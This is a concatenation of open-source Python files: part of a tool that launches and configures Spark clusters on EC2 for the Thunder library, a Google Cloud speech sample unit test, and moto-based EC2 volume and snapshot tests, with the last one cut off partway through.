ssh(master, opts, "chmod u+x thunder/bin/build")
ssh(master, opts, "source ~/.bash_profile && thunder/bin/build")
ssh(master, opts, "echo 'export PATH=/root/thunder/bin:$PATH' >> /root/.bash_profile")
# add AWS credentials to ~/.boto
access, secret = get_s3_keys()
credentialstring = "[Credentials]\naws_access_key_id = ACCESS\naws_secret_access_key = SECRET\n"
credentialsfilled = credentialstring.replace('ACCESS', access).replace('SECRET', secret)
ssh(master, opts, "printf '"+credentialsfilled+"' > /root/.boto")
ssh(master, opts, "printf '[s3]\ncalling_format = boto.s3.connection.OrdinaryCallingFormat' >> /root/.boto")
ssh(master, opts, "pscp.pssh -h /root/spark-ec2/slaves /root/.boto /root/.boto")
print_success()
def configure_spark(master, opts):
""" Configure Spark with useful settings for running Thunder """
print_status("Configuring Spark for Thunder")
# customize spark configuration parameters
ssh(master, opts, "echo 'spark.akka.frameSize=2047' >> /root/spark/conf/spark-defaults.conf")
ssh(master, opts, "echo 'spark.kryoserializer.buffer.max.mb=1024' >> /root/spark/conf/spark-defaults.conf")
ssh(master, opts, "echo 'spark.driver.maxResultSize=0' >> /root/spark/conf/spark-defaults.conf")
ssh(master, opts, "echo 'export SPARK_DRIVER_MEMORY=20g' >> /root/spark/conf/spark-env.sh")
ssh(master, opts, "sed 's/log4j.rootCategory=INFO/log4j.rootCategory=ERROR/g' "
"/root/spark/conf/log4j.properties.template > /root/spark/conf/log4j.properties")
# point spark to the anaconda python
ssh(master, opts, "echo 'export PYSPARK_DRIVER_PYTHON=/root/anaconda/bin/python' >> "
"/root/spark/conf/spark-env.sh")
ssh(master, opts, "echo 'export PYSPARK_PYTHON=/root/anaconda/bin/python' >> "
"/root/spark/conf/spark-env.sh")
ssh(master, opts, "/root/spark-ec2/copy-dir /root/spark/conf")
# add AWS credentials to core-site.xml
configstring = "<property><name>fs.s3n.awsAccessKeyId</name><value>ACCESS</value></property><property>" \
"<name>fs.s3n.awsSecretAccessKey</name><value>SECRET</value></property>"
access, secret = get_s3_keys()
filled = configstring.replace('ACCESS', access).replace('SECRET', secret)
ssh(master, opts, "sed -i'f' 's,.*</configuration>.*,"+filled+"&,' /root/ephemeral-hdfs/conf/core-site.xml")
ssh(master, opts, "sed -i'f' 's,.*</configuration>.*,"+filled+"&,' /root/spark/conf/core-site.xml")
# configure requester pays
ssh(master, opts, "touch /root/spark/conf/jets3t.properties")
ssh(master, opts, "echo 'httpclient.requester-pays-buckets-enabled = true' >> /root/spark/conf/jets3t.properties")
ssh(master, opts, "~/spark-ec2/copy-dir /root/spark/conf")
print_success()
# This is a customized version of the spark_ec2 ssh() function that
# adds additional options to squash ssh host key checking errors that
# occur when the ip addresses of your ec2 nodes change when you
# start/stop a cluster. Lame to have to copy all this code over, but
# this seemed the simplest way to add this necessary functionality.
def ssh_args(opts):
parts = ['-o', 'StrictHostKeyChecking=no'] + EXTRA_SSH_OPTS
# Never store EC2 IPs in known hosts...
if opts.identity_file is not None:
parts += ['-i', opts.identity_file]
return parts
def ssh_command(opts):
return ['ssh'] + ssh_args(opts)
def ssh(host, opts, command):
tries = 0
cmd = ssh_command(opts) + ['-t', '-t', '%s@%s' % (opts.user, host), stringify_command(command)]
while True:
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout = process.communicate()[0]
code = process.returncode
if code != 0:
if tries > 2:
print_error("SSH failure, returning error")
raise Exception(stdout)
else:
time.sleep(3)
tries += 1
else:
return
def setup_cluster(conn, master_nodes, slave_nodes, opts, deploy_ssh_key):
"""
Modified version of the setup_cluster function (borrowed from spark-ec.py)
in order to manually set the folder with the deploy code
"""
master = master_nodes[0].public_dns_name
if deploy_ssh_key:
print_status("Generating cluster's SSH key on master")
key_setup = """
[ -f ~/.ssh/id_rsa ] ||
(ssh-keygen -q -t rsa -N '' -f ~/.ssh/id_rsa &&
cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys)
"""
ssh(master, opts, key_setup)
print_success()
with quiet():
dot_ssh_tar = ssh_read(master, opts, ['tar', 'c', '.ssh'])
print_status("Transferring cluster's SSH key to slaves")
with quiet():
for slave in slave_nodes:
ssh_write(slave.public_dns_name, opts, ['tar', 'x'], dot_ssh_tar)
print_success()
modules = ['spark', 'shark', 'ephemeral-hdfs', 'persistent-hdfs',
'mapreduce', 'spark-standalone', 'tachyon']
if opts.hadoop_major_version == "1":
modules = filter(lambda x: x != "mapreduce", modules)
if opts.ganglia:
modules.append('ganglia')
if spark_home_loose_version >= LooseVersion("1.3.0"):
MESOS_SPARK_EC2_BRANCH = "branch-1.3"
ssh(master, opts, "rm -rf spark-ec2 && git clone https://github.com/mesos/spark-ec2.git "
"-b {b}".format(b=MESOS_SPARK_EC2_BRANCH))
else:
ssh(master, opts, "rm -rf spark-ec2 && git clone https://github.com/mesos/spark-ec2.git "
"-b v4")
print_status("Deploying files to master")
deploy_folder = os.path.join(os.environ['SPARK_HOME'], "ec2", "deploy.generic")
with quiet():
deploy_files(conn, deploy_folder, opts, master_nodes, slave_nodes, modules)
print_success()
print_status("Installing Spark (may take several minutes)")
setup_spark_cluster(master, opts)
print_success()
if __name__ == "__main__":
spark_home_version_string = get_spark_version_string(MINIMUM_SPARK_VERSION)
spark_home_loose_version = LooseVersion(spark_home_version_string)
parser = OptionParser(usage="thunder-ec2 [options] <action> <clustername>", add_help_option=False)
parser.add_option("-h", "--help", action="help", help="Show this help message and exit")
parser.add_option("-k", "--key-pair", help="Key pair to use on instances")
parser.add_option("-s", "--slaves", type="int", default=1, help="Number of slaves to launch (default: 1)")
parser.add_option("-i", "--identity-file", help="SSH private key file to use for logging into instances")
parser.add_option("-r", "--region", default="us-east-1", help="EC2 region zone to launch instances "
"in (default: us-east-1)")
parser.add_option("-t", "--instance-type", default="m3.2xlarge",
help="Type of instance to launch (default: m3.2xlarge)." +
" WARNING: must be 64-bit; small instances won't work")
parser.add_option(
"-m", "--master-instance-type", default="",
help="Master instance type (leave empty for same as instance-type)")
parser.add_option("-u", "--user", default="root", help="User name for cluster (default: root)")
parser.add_option("-v", "--spark-version", default=spark_home_version_string,
help="Version of Spark to use: 'X.Y.Z' or a specific git hash. (default: %s)" %
spark_home_version_string)
parser.add_option("--thunder-version", default=get_default_thunder_version(),
help="Version of Thunder to use: 'X.Y.Z', 'HEAD' (current state of master branch), " +
" or a specific git hash. (default: '%default')")
if spark_home_loose_version >= LooseVersion("1.2.0"):
parser.add_option(
"-w", "--wait", type="int", default=160,
help="DEPRECATED (no longer necessary for Spark >= 1.2.0) - Seconds to wait for nodes to start")
else:
parser.add_option("-w", "--wait", type="int", default=160,
help="Seconds to wait for nodes to start (default: 160)")
parser.add_option("-z", "--zone", default="", help="Availability zone to launch instances in, or 'all' to spread "
"slaves across multiple (an additional $0.01/Gb for "
"bandwidth between zones applies)")
parser.add_option(
"--spark-git-repo",
default="https://github.com/apache/spark",
help="Github repo from which to checkout supplied commit hash")
parser.add_option(
"--hadoop-major-version", default="1",
help="Major version of Hadoop (default: %default)")
parser.add_option("--ssh-port-forwarding", default=None,
help="Set up ssh port forwarding when you login to the cluster. " +
"This provides a convenient alternative to connecting to iPython " +
"notebook over an open port using SSL. You must supply an argument " +
"of the form \"local_port:remote_port\".")
parser.add_option(
"--ebs-vol-size", metavar="SIZE", type="int", default=0,
help="Size (in GB) of each EBS volume.")
parser.add_option(
"--ebs-vol-type", default="standard",
help="EBS volume type (e.g. 'gp2', 'standard').")
parser.add_option(
"--ebs-vol-num", type="int", default=1,
help="Number of EBS volumes to attach to each node as /vol[x]. " +
"The volumes will be deleted when the instances terminate. " +
"Only possible on EBS-backed AMIs. " +
"EBS volumes are only attached if --ebs-vol-size > 0." +
"Only support up to 8 EBS volumes.")
parser.add_option(
"--swap", metavar="SWAP", type="int", default=1024,
help="Swap space to set up per node, in MB (default: %default)")
parser.add_option("--spot-price", metavar="PRICE", type="float",
help="If specified, launch slaves as spot instances with the given " +
"maximum price (in dollars)")
parser.add_option(
"--ganglia", action="store_true", default=True,
help="Setup Ganglia monitoring on cluster (default: %default). NOTE: " +
"the Ganglia page will be publicly accessible")
parser.add_option(
"--no-ganglia", action="store_false", dest="ganglia",
help="Disable Ganglia monitoring for the cluster")
parser.add_option("--resume", default=False, action="store_true",
help="Resume installation on a previously launched cluster (for debugging)")
parser.add_option(
"--worker-instances", type="int", default=1,
help="Number of instances per worker: variable SPARK_WORKER_INSTANCES (default: %default)")
parser.add_option("--master-opts", type="string", default="",
help="Extra options to give to master through SPARK_MASTER_OPTS variable " +
"(e.g -Dspark.worker.timeout=180)")
parser.add_option("--user-data", type="string", default="",
help="Path to a user-data file (most AMI's interpret this as an initialization script)")
if spark_home_loose_version >= LooseVersion("1.2.0"):
parser.add_option("--authorized-address", type="string", default="0.0.0.0/0",
help="Address to authorize on created security groups (default: %default)" +
" (only with Spark >= 1.2.0)")
parser.add_option("--additional-security-group", type="string", default="",
help="Additional security group to place the machines in (only with Spark >= 1.2.0)")
parser.add_option("--copy-aws-credentials", action="store_true", default=False,
help="Add AWS credentials to hadoop configuration to allow Spark to access S3" +
" (only with Spark >= 1.2.0)")
if spark_home_loose_version >= LooseVersion("1.3.0"):
parser.add_option("--subnet-id", default=None,
help="VPC subnet to launch instances in (only with Spark >= 1.3.0")
parser.add_option("--vpc-id", default=None,
help="VPC to launch instances in (only with Spark >= 1.3.0)")
parser.add_option("--placement-group", type="string", default=None,
help="Which placement group to try and launch instances into. Assumes placement "
"group is already created.")
parser.add_option("--spark-ec2-git-repo", default="https://github.com/mesos/spark-ec2",
help="Github repo from which to checkout spark-ec2 (default: %default)")
parser.add_option("--spark-ec2-git-branch", default="branch-1.3",
help="Github repo branch of spark-ec2 to use (default: %default)")
parser.add_option("--private-ips", action="store_true", default=False,
help="Use private IPs for instances rather than public if VPC/subnet " +
"requires that.")
(opts, args) = parser.parse_args()
if len(args) != 2:
parser.print_help()
sys.exit(1)
(action, cluster_name) = args
spark_version_string = opts.spark_version
# check that requested spark version is <= the $SPARK_HOME version, or is a github hash
if '.' in spark_version_string:
# version string is dotted, not a hash
spark_cluster_loose_version = LooseVersion(spark_version_string)
if spark_cluster_loose_version > spark_home_loose_version:
raise ValueError("Requested cluster Spark version '%s' is greater " % spark_version_string
+ "than the local version of Spark in $SPARK_HOME, '%s'" % spark_home_version_string)
if spark_cluster_loose_version < LooseVersion(MINIMUM_SPARK_VERSION):
raise ValueError("Requested cluster Spark version '%s' is less " % spark_version_string
+ "than the minimum version required for Thunder, '%s'" % MINIMUM_SPARK_VERSION)
opts.ami = get_spark_ami(opts) # "ami-3ecd0c56"\
# get version string as github commit hash if needed (mainly to support Spark release candidates)
opts.spark_version = remap_spark_version_to_hash(spark_version_string)
# Launch a cluster, setting several options to defaults
# (use spark-ec2.py included with Spark for more control)
if action == "launch":
try:
conn = ec2.connect_to_region(opts.region)
except Exception as e:
print >> stderr, (e)
sys.exit(1)
if opts.zone == "":
opts.zone = random.choice(conn.get_all_zones()).name
if opts.resume:
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
else:
(master_nodes, slave_nodes) = launch_cluster(conn, opts, cluster_name)
try:
wait_for_cluster(conn, opts.wait, master_nodes, slave_nodes)
except NameError:
if spark_home_loose_version >= LooseVersion("1.3.0"):
wait_for_cluster_state(cluster_instances=(master_nodes + slave_nodes),
cluster_state='ssh-ready', opts=opts, conn=conn)
else:
wait_for_cluster_state(cluster_instances=(master_nodes + slave_nodes),
cluster_state='ssh-ready', opts=opts)
print("")
setup_cluster(conn, master_nodes, slave_nodes, opts, True)
master = master_nodes[0].public_dns_name
install_anaconda(master, opts)
install_thunder(master, opts)
configure_spark(master, opts)
print("")
print("Cluster successfully launched!")
print("")
print("Go to " + colored("http://%s:8080" % master, 'blue') + " to see the web UI for your cluster")
if opts.ganglia:
print("Go to " + colored("http://%s:5080/ganglia" % master, 'blue') + " to view ganglia monitor")
print("")
if action != "launch":
conn = ec2.connect_to_region(opts.region)
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
master = master_nodes[0].public_dns_name
# Login to the cluster
if action == "login":
print "Logging into master " + master + "..."
proxy_opt = []
# SSH tunnels are a convenient, zero-configuration
# alternative to opening a port using the EC2 security
# group settings and using iPython notebook over SSL.
#
# If the user has requested ssh port forwarding, we set
# that up here.
if opts.ssh_port_forwarding is not None:
ssh_ports = opts.ssh_port_forwarding.split(":")
if len(ssh_ports) != 2:
print "\nERROR: Could not parse arguments to \'--ssh-port-forwarding\'."
print " Be sure you use the syntax \'local_port:remote_port\'"
sys.exit(1)
print ("\nSSH port forwarding requested. Remote port " + ssh_ports[1] +
" will be accessible at http://localhost:" + ssh_ports[0] + '\n')
try:
subprocess.check_call(ssh_command(opts) + proxy_opt + EXTRA_SSH_OPTS +
['-L', ssh_ports[0] +
':127.0.0.1:' + ssh_ports[1],
'-o', 'ExitOnForwardFailure=yes',
'-t', '-t', "%s@%s" % (opts.user, master)])
except subprocess.CalledProcessError:
print "\nERROR: Could not establish ssh connection with port forwarding."
print " Check your Internet connection and make sure that the"
print " ports you have requested are not already in use."
sys.exit(1)
else:
subprocess.check_call(ssh_command(opts) + proxy_opt + EXTRA_SSH_OPTS +
['-t', '-t',
"%s@%s" % (opts.user, master)])
elif action == "reboot-slaves":
response = raw_input(
"Are you sure you want to reboot the cluster " +
cluster_name + " slaves?\n" +
"Reboot cluster slaves " + cluster_name + " (y/N): ")
if response == "y":
(master_nodes, slave_nodes) = get_existing_cluster(
conn, opts, cluster_name, die_on_error=False)
print "Rebooting slaves..."
for inst in slave_nodes:
if inst.state not in ["shutting-down", "terminated"]:
print "Rebooting " + inst.id
inst.reboot()
elif action == "get-master":
print master_nodes[0].public_dns_name
# Install thunder on the cluster
elif action == "install":
#install_anaconda(master, opts)
install_thunder(master, opts)
configure_spark(master, opts)
# Stop a running cluster. Storage on EBS volumes is
# preserved, so you can restart the cluster in the same state
# (though you do pay a modest fee for EBS storage in the
# meantime).
elif action == "stop":
response = raw_input(
"Are you sure you want to stop the cluster " +
cluster_name + "?\nDATA ON EPHEMERAL DISKS WILL BE LOST, " +
"BUT THE CLUSTER WILL KEEP USING SPACE ON\n" +
"AMAZON EBS IF IT IS EBS-BACKED!!\n" +
"All data on spot-instance slaves will be lost.\n" +
"Stop cluster " + cluster_name + " (y/N): ")
if response == "y":
(master_nodes, slave_nodes) = get_existing_cluster(
conn, opts, cluster_name, die_on_error=False)
print "Stopping master..."
for inst in master_nodes:
if inst.state not in ["shutting-down", "terminated"]:
inst.stop()
print "Stopping slaves..."
for inst in slave_nodes:
if inst.state not in ["shutting-down", "terminated"]:
if inst.spot_instance_request_id:
inst.terminate()
else:
inst.stop()
# Restart a stopped cluster
elif action == "start":
print "Starting slaves..."
for inst in slave_nodes:
if inst.state not in ["shutting-down", "terminated"]:
inst.start()
print "Starting master..."
for inst in master_nodes:
if inst.state not in ["shutting-down", "terminated"]:
inst.start()
try:
wait_for_cluster(conn, opts.wait, master_nodes, slave_nodes)
except NameError:
if spark_home_loose_version >= LooseVersion("1.3.0"):
wait_for_cluster_state(cluster_instances=(master_nodes + slave_nodes),
cluster_state='ssh-ready', opts=opts, conn=conn)
else:
wait_for_cluster_state(cluster_instances=(master_nodes + slave_nodes),
cluster_state='ssh-ready', opts=opts)
print("")
setup_cluster(conn, master_nodes, slave_nodes, opts, False)
master = master_nodes[0].public_dns_name
configure_spark(master, opts)
print("")
print("Cluster successfully restarted!")
print("Go to " + colored("http://%s:8080" % master, 'blue') + " to see the web UI for your cluster")
print("")
# Destroy the cluster
elif action == "destroy":
response = raw_input("Are you sure you want to destroy the cluster " + cluster_name +
"?\nALL DATA ON ALL NODES WILL BE LOST!!\n" +
"Destroy cluster " + cluster_name + " (y/N): ")
if response == "y":
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name, die_on_error=False)
print "Terminating master..."
for inst in master_nodes:
inst.terminate()
print "Terminating slaves..."
for inst in slave_nodes:
inst.terminate()
else:
raise NotImplementedError("action: " + action + "not recognized")
|
zhwa/thunder
|
thunder/utils/ec2.py
|
Python
|
apache-2.0
| 31,603
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
class TestSample(unittest.TestCase):
SAMPLE_RATE = 16000
AUDIO_SOURCE_URI = 'gs://sample-bucket/sample-recording.flac'
@staticmethod
def _get_target_class():
from google.cloud.speech.sample import Sample
return Sample
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
def test_initialize_sample(self):
from google.cloud.speech.encoding import Encoding
sample = self._make_one(source_uri=self.AUDIO_SOURCE_URI,
encoding=Encoding.FLAC,
sample_rate=self.SAMPLE_RATE)
self.assertEqual(sample.source_uri, self.AUDIO_SOURCE_URI)
self.assertEqual(sample.encoding, Encoding.FLAC)
self.assertEqual(sample.sample_rate, self.SAMPLE_RATE)
def test_content_and_source_uri(self):
with self.assertRaises(ValueError):
self._make_one(content='awefawagaeragere',
source_uri=self.AUDIO_SOURCE_URI)
def test_sample_rates(self):
from google.cloud.speech.encoding import Encoding
with self.assertRaises(ValueError):
self._make_one(source_uri=self.AUDIO_SOURCE_URI,
sample_rate=7999)
with self.assertRaises(ValueError):
self._make_one(source_uri=self.AUDIO_SOURCE_URI,
sample_rate=48001)
sample = self._make_one(source_uri=self.AUDIO_SOURCE_URI,
sample_rate=self.SAMPLE_RATE,
encoding=Encoding.FLAC)
self.assertEqual(sample.sample_rate, self.SAMPLE_RATE)
self.assertEqual(sample.encoding, Encoding.FLAC)
sample = self._make_one(source_uri=self.AUDIO_SOURCE_URI,
encoding=Encoding.FLAC)
self.assertEqual(sample.sample_rate, self.SAMPLE_RATE)
def test_encoding(self):
from google.cloud.speech.encoding import Encoding
with self.assertRaises(ValueError):
self._make_one(source_uri=self.AUDIO_SOURCE_URI,
sample_rate=self.SAMPLE_RATE,
encoding='OGG')
with self.assertRaises(ValueError):
self._make_one(source_uri=self.AUDIO_SOURCE_URI,
sample_rate=self.SAMPLE_RATE)
sample = self._make_one(source_uri=self.AUDIO_SOURCE_URI,
sample_rate=self.SAMPLE_RATE,
encoding=Encoding.FLAC)
self.assertEqual(sample.encoding, Encoding.FLAC)
|
quom/google-cloud-python
|
speech/unit_tests/test_sample.py
|
Python
|
apache-2.0
| 3,192
|
from __future__ import unicode_literals
# Ensure 'assert_raises' context manager support for Python 2.6
import tests.backport_assert_raises
from nose.tools import assert_raises
from moto.ec2 import ec2_backends
import boto
from boto.exception import EC2ResponseError
import sure # noqa
from moto import mock_ec2
@mock_ec2
def test_create_and_delete_volume():
conn = boto.connect_ec2('the_key', 'the_secret')
volume = conn.create_volume(80, "us-east-1a")
all_volumes = conn.get_all_volumes()
all_volumes.should.have.length_of(1)
all_volumes[0].size.should.equal(80)
all_volumes[0].zone.should.equal("us-east-1a")
volume = all_volumes[0]
volume.delete()
conn.get_all_volumes().should.have.length_of(0)
# Deleting something that was already deleted should throw an error
with assert_raises(EC2ResponseError) as cm:
volume.delete()
cm.exception.code.should.equal('InvalidVolume.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
@mock_ec2
def test_filter_volume_by_id():
conn = boto.connect_ec2('the_key', 'the_secret')
volume1 = conn.create_volume(80, "us-east-1a")
volume2 = conn.create_volume(36, "us-east-1b")
volume3 = conn.create_volume(20, "us-east-1c")
vol1 = conn.get_all_volumes(volume_ids=volume3.id)
vol1.should.have.length_of(1)
vol1[0].size.should.equal(20)
vol1[0].zone.should.equal('us-east-1c')
vol2 = conn.get_all_volumes(volume_ids=[volume1.id, volume2.id])
vol2.should.have.length_of(2)
@mock_ec2
def test_volume_filters():
conn = boto.connect_ec2('the_key', 'the_secret')
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
instance.update()
volume1 = conn.create_volume(80, "us-east-1a")
volume2 = conn.create_volume(36, "us-east-1b")
volume3 = conn.create_volume(20, "us-east-1c")
snapshot = volume3.create_snapshot(description='testsnap')
volume4 = conn.create_volume(25, "us-east-1a", snapshot=snapshot)
conn.create_tags([volume1.id], {'testkey1': 'testvalue1'})
conn.create_tags([volume2.id], {'testkey2': 'testvalue2'})
volume1.update()
volume2.update()
volume3.update()
volume4.update()
block_mapping = instance.block_device_mapping['/dev/sda1']
volumes_by_attach_time = conn.get_all_volumes(filters={'attachment.attach-time': block_mapping.attach_time})
set([vol.id for vol in volumes_by_attach_time]).should.equal(set([block_mapping.volume_id]))
volumes_by_attach_device = conn.get_all_volumes(filters={'attachment.device': '/dev/sda1'})
set([vol.id for vol in volumes_by_attach_device]).should.equal(set([block_mapping.volume_id]))
volumes_by_attach_instance_id = conn.get_all_volumes(filters={'attachment.instance-id': instance.id})
set([vol.id for vol in volumes_by_attach_instance_id]).should.equal(set([block_mapping.volume_id]))
volumes_by_create_time = conn.get_all_volumes(filters={'create-time': volume4.create_time})
set([vol.create_time for vol in volumes_by_create_time]).should.equal(set([volume4.create_time]))
volumes_by_size = conn.get_all_volumes(filters={'size': volume2.size})
set([vol.id for vol in volumes_by_size]).should.equal(set([volume2.id]))
volumes_by_snapshot_id = conn.get_all_volumes(filters={'snapshot-id': snapshot.id})
set([vol.id for vol in volumes_by_snapshot_id]).should.equal(set([volume4.id]))
volumes_by_status = conn.get_all_volumes(filters={'status': 'in-use'})
set([vol.id for vol in volumes_by_status]).should.equal(set([block_mapping.volume_id]))
volumes_by_id = conn.get_all_volumes(filters={'volume-id': volume1.id})
set([vol.id for vol in volumes_by_id]).should.equal(set([volume1.id]))
volumes_by_tag_key = conn.get_all_volumes(filters={'tag-key': 'testkey1'})
set([vol.id for vol in volumes_by_tag_key]).should.equal(set([volume1.id]))
volumes_by_tag_value = conn.get_all_volumes(filters={'tag-value': 'testvalue1'})
set([vol.id for vol in volumes_by_tag_value]).should.equal(set([volume1.id]))
volumes_by_tag = conn.get_all_volumes(filters={'tag:testkey1': 'testvalue1'})
set([vol.id for vol in volumes_by_tag]).should.equal(set([volume1.id]))
@mock_ec2
def test_volume_attach_and_detach():
conn = boto.connect_ec2('the_key', 'the_secret')
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
volume = conn.create_volume(80, "us-east-1a")
volume.update()
volume.volume_state().should.equal('available')
volume.attach(instance.id, "/dev/sdh")
volume.update()
volume.volume_state().should.equal('in-use')
volume.attach_data.instance_id.should.equal(instance.id)
volume.detach()
volume.update()
volume.volume_state().should.equal('available')
with assert_raises(EC2ResponseError) as cm1:
volume.attach('i-1234abcd', "/dev/sdh")
cm1.exception.code.should.equal('InvalidInstanceID.NotFound')
cm1.exception.status.should.equal(400)
cm1.exception.request_id.should_not.be.none
with assert_raises(EC2ResponseError) as cm2:
conn.detach_volume(volume.id, instance.id, "/dev/sdh")
cm2.exception.code.should.equal('InvalidAttachment.NotFound')
cm2.exception.status.should.equal(400)
cm2.exception.request_id.should_not.be.none
with assert_raises(EC2ResponseError) as cm3:
conn.detach_volume(volume.id, 'i-1234abcd', "/dev/sdh")
cm3.exception.code.should.equal('InvalidInstanceID.NotFound')
cm3.exception.status.should.equal(400)
cm3.exception.request_id.should_not.be.none
@mock_ec2
def test_create_snapshot():
conn = boto.connect_ec2('the_key', 'the_secret')
volume = conn.create_volume(80, "us-east-1a")
snapshot = volume.create_snapshot('a test snapshot')
snapshot.update()
snapshot.status.should.equal('completed')
snapshots = conn.get_all_snapshots()
snapshots.should.have.length_of(1)
snapshots[0].description.should.equal('a test snapshot')
snapshots[0].start_time.should_not.be.none
# Create snapshot without description
snapshot = volume.create_snapshot()
conn.get_all_snapshots().should.have.length_of(2)
snapshot.delete()
conn.get_all_snapshots().should.have.length_of(1)
# Deleting something that was already deleted should throw an error
with assert_raises(EC2ResponseError) as cm:
snapshot.delete()
cm.exception.code.should.equal('InvalidSnapshot.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
@mock_ec2
def test_filter_snapshot_by_id():
conn = boto.connect_ec2('the_key', 'the_secret')
volume1 = conn.create_volume(36, "us-east-1a")
snap1 = volume1.create_snapshot('a test snapshot 1')
volume2 = conn.create_volume(42, 'us-east-1a')
snap2 = volume2.create_snapshot('a test snapshot 2')
volume3 = conn.create_volume(84, 'us-east-1a')
snap3 = volume3.create_snapshot('a test snapshot 3')
snapshots1 = conn.get_all_snapshots(snapshot_ids=snap2.id)
snapshots1.should.have.length_of(1)
snapshots1[0].volume_id.should.equal(volume2.id)
snapshots1[0].region.name.should.equal(conn.region.name)
snapshots2 = conn.get_all_snapshots(snapshot_ids=[snap2.id, snap3.id])
snapshots2.should.have.length_of(2)
for s in snapshots2:
s.start_time.should_not.be.none
s.volume_id.should.be.within([volume2.id, volume3.id])
s.region.name.should.equal(conn.region.name)
@mock_ec2
def test_snapshot_filters():
conn = boto.connect_ec2('the_key', 'the_secret')
volume1 = conn.create_volume(20, "us-east-1a")
volume2 = conn.create_volume(25, "us-east-1a")
snapshot1 = volume1.create_snapshot(description='testsnapshot1')
snapshot2 = volume1.create_snapshot(description='testsnapshot2')
snapshot3 = volume2.create_snapshot(description='testsnapshot3')
conn.create_tags([snapshot1.id], {'testkey1': 'testvalue1'})
conn.create_tags([snapshot2.id], {'testkey2': 'testvalue2'})
snapshots_by_description = conn.get_all_snapshots(filters={'description': 'testsnapshot1'})
set([snap.id for snap in snapshots_by_description]).should.equal(set([snapshot1.id]))
snapshots_by_id = conn.get_all_snapshots(filters={'snapshot-id': snapshot1.id})
set([snap.id for snap in snapshots_by_id]).should.equal(set([snapshot1.id]))
snapshots_by_start_time = conn.get_all_snapshots(filters={'start-time': snapshot1.start_time})
set([snap.start_time for snap in snapshots_by_start_time]).should.equal(set([snapshot1.start_time]))
snapshots_by_volume_id = conn.get_all_snapshots(filters={'volume-id': volume1.id})
set([snap.id for snap in snapshots_by_volume_id]).should.equal(set([snapshot1.id, snapshot2.id]))
snapshots_by_volume_size = conn.get_all_snapshots(filters={'volume-size': volume1.size})
set([snap.id for snap in snapshots_by_volume_size]).should.equal(set([snapshot1.id, snapshot2.id]))
snapshots_by_tag_key = conn.get_all_snapshots(filters={'tag-key': 'testkey1'})
set([snap.id for snap in snapshots_by_tag_key]).should.equal(set([snapshot1.id]))
snapshots_by_tag_value = conn.get_all_snapshots(filters={'tag-value': 'testvalue1'})
set([snap.id for snap in snapshots_by_tag_value]).should.equal(set([snapshot1.id]))
snapshots_by_tag = conn.get_all_snapshots(filters={'tag:testkey1': 'testvalue1'})
set([snap.id for snap in snapshots_by_tag]).should.equal(set([snapshot1.id]))
@mock_ec2
def test_snapshot_attribute():
conn = boto.connect_ec2('the_key', 'the_secret')
volume = conn.create_volume(80, "us-east-1a")
snapshot = volume.create_snapshot()
# Baseline
attributes = conn.get_snapshot_attribute(snapshot.id, attribute='createVolumePermission')
attributes.name.should.equal('create_volume_permission')
attributes.attrs.should.have.length_of(0)
ADD_GROUP_ARGS = {'snapshot_id': snapshot.id,
'attribute': 'createVolumePermission',
'operation': 'add',
'groups': 'all'}
REMOVE_GROUP_ARGS = {'snapshot_id': snapshot.id,
'attribute': 'createVolumePermission',
'operation': 'remove',
'groups': 'all'}
# Add 'all' group and confirm
conn.modify_snapshot_attribute(**ADD_GROUP_ARGS)
attributes = conn.get_snapshot_attribute(snapshot.id, attribute='createVolumePermission')
attributes.attrs['groups'].should.have.length_of(1)
attributes.attrs['groups'].should.equal(['all'])
# Add is idempotent
conn.modify_snapshot_attribute.when.called_with(**ADD_GROUP_ARGS).should_not.throw(EC2ResponseError)
# Remove 'all' group and confirm
conn.modify_snapshot_attribute(**REMOVE_GROUP_ARGS)
attributes = conn.get_snapshot_attribute(snapshot.id, attribute='createVolumePermission')
attributes.attrs.should.have.length_of(0)
# Remove is idempotent
conn.modify_snapshot_attribute.when.called_with(**REMOVE_GROUP_ARGS).should_not.throw(EC2ResponseError)
# Error: Add with group != 'all'
with assert_raises(EC2ResponseError) as cm:
conn.modify_snapshot_attribute(snapshot.id,
attribute='createVolumePermission',
operation='add',
groups='everyone')
cm.exception.code.should.equal('InvalidAMIAttributeItemValue')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Error: Add with invalid snapshot ID
with assert_raises(EC2ResponseError) as cm:
conn.modify_snapshot_attribute("snapshot-abcd1234",
attribute='createVolumePermission',
operation='add',
groups='all')
cm.exception.code.should.equal('InvalidSnapshot.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Error: Remove with invalid snapshot ID
with assert_raises(EC2ResponseError) as cm:
conn.modify_snapshot_attribute("snapshot-abcd1234",
attribute='createVolumePermission',
operation='remove',
groups='all')
cm.exception.code.should.equal('InvalidSnapshot.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Error: Add or remove with user ID instead of group
conn.modify_snapshot_attribute.when.called_with(snapshot.id,
attribute='createVolumePermission',
operation='add',
user_ids=['user']).should.throw(NotImplementedError)
conn.modify_snapshot_attribute.when.called_with(snapshot.id,
attribute='createVolumePermission',
operation='remove',
user_ids=['user']).should.throw(NotImplementedError)
@mock_ec2
def test_create_volume_from_snapshot():
conn = boto.connect_ec2('the_key', 'the_secret')
volume = conn.create_volume(80, "us-east-1a")
snapshot = volume.create_snapshot('a test snapshot')
snapshot.update()
snapshot.status.should.equal('completed')
new_volume = snapshot.create_volume('us-east-1a')
